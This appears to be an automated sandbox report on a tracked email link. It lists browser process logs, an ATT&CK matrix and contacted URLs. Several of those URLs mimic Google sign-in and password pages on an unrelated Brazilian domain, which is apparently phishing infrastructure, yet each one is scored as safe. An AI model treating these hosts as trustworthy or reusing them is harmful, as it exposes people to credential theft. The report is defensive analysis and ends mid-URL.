Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1904,i,2393401072678527284,7300859850790636309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://serviceonesystem.org/wp-includes/blocks/navigation/style.min.css?ver=6.7.10%Avira URL Cloudsafe
https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=10%Avira URL Cloudsafe
https://ijgbload.koaladrinks.com.br/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=WZfWSd%2CAho3hb%2Ci3kFoc%2CzKAP2e%2CRzSO2e&source-path=%2Fv3%2Fsignin%2Fchallenge%2Fpwd&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&_reqid=312469&rt=c0%Avira URL Cloudsafe
https://serviceonesystem.org/wp-includes/js/dist/script-modules/interactivity/index.min.js?ver=06b8f695ef48ab2d92770%Avira URL Cloudsafe
https://serviceonesystem.org/index.php/wp-json/0%Avira URL Cloudsafe
https://serviceonesystem.org/wp-includes/js/dist/script-modules/block-library/navigation/view.min.js?ver=8ff192874fc8910a284c0%Avira URL Cloudsafe
https://ijgbload.koaladrinks.com.br/s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202/c9748d5c3ac951761ec94a41d03d3d9654c2f89666a929be7fcddaf1832a3cbc.js0%Avira URL Cloudsafe
https://serviceonesystem.org/wp-content/themes/twentytwentyfive/style.css?ver=1.00%Avira URL Cloudsafe
https://www3.koaladrinks.com.br/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,pxq3x,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=K1ZKnb,ziZ8Mc,b3kMqb,mvkUhe,CMcBD,Fndnac,t2srLd,EN3i8d,z0u0L,xiZRqc0%Avira URL Cloudsafe
https://www3.koaladrinks.com.br/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=LEikZe,_b,_tp,byfTOb,lsjVmc/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=n73qwf,SCuOPb,IZT63,vfuNJf,UUJqVe,ws9Tlc,siKnQd,cciGGe,m9oV,vjKJJ,y5vRwf,L9OGUe,PrPYRd,MpJwZc,cYShmd,hc6Ubd,Rkm0ef,KUM7Z,WpP9Yc,lwddkf,SpsfSb,aC1iue,EFQ78c,xQtZb,zbML3c,zr1jrb,vHEMJe,YHI3We,YTxL4,Uas9Hd,zy0vNb,K0PMbc,qmdT9,LDQI0%Avira URL Cloudsafe
https://cliks.serviceonesystem.org/?_kx=8HbiTT4litESi4AjCoiaOA.V3Xdb40%Avira URL Cloudsafe
https://serviceonesystem.org/index.php/2025/01/06/hello-world/0%Avira URL Cloudsafe
https://www3.koaladrinks.com.br/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=pxq3x0%Avira URL Cloudsafe
https://serviceonesystem.org0%Avira URL Cloudsafe
https://ijgbload.koaladrinks.com.br/_/bscframe0%Avira URL Cloudsafe
https://www3.koaladrinks.com.br/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,b3kMqb,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,lwddkf,m9oV,mvkUhe,n73qwf,pxq3x,qmdT9,siKnQd,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ltDFwf,SD8Jgb,rmumx,E87wgc,qPYxq,Tbb4sb,soHxf,YgOFye,oqkvIf,yRXbo,bTi8wc,ywOR5c,PHUIyb0%Avira URL Cloudsafe
https://serviceonesystem.org/wp-content/themes/twentytwentyfive/assets/fonts/manrope/Manrope-Variabl0%Avira URL Cloudsafe
https://www3.koaladrinks.com.br/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=P6sQOc0%Avira URL Cloudsafe
https://www3.koaladrinks.com.br/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=_b,_tp/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=byfTOb,lsjVmc,LEikZe0%Avira URL Cloudsafe
https://www3.koaladrinks.com.br/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,pxq3x,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=f8Gu1e0%Avira URL Cloudsafe
https://serviceonesystem.org/wp-includes/js/dist/script-modules/block-library/navigation/view.min.js0%Avira URL Cloudsafe
https://www.teledataict.com/media/2017/03/google-drive.jpg0%Avira URL Cloudsafe
https://ijgbload.koaladrinks.com.br/s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f272020%Avira URL Cloudsafe
https://ijgbload.koaladrinks.com.br/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin0%Avira URL Cloudsafe
https://www3.koaladrinks.com.br/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=iAskyc,ziXSP0%Avira URL Cloudsafe
https://ijgbload.koaladrinks.com.br/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=B4hajb&source-path=%2Fv3%2Fsignin%2Fchallenge%2Fpwd&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&_reqid=412469&rt=c0%Avira URL Cloudsafe
https://www3.koaladrinks.com.br/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,OTcFib,P6sQOc,PHUIyb,PXsWy,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,jGvTv,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKn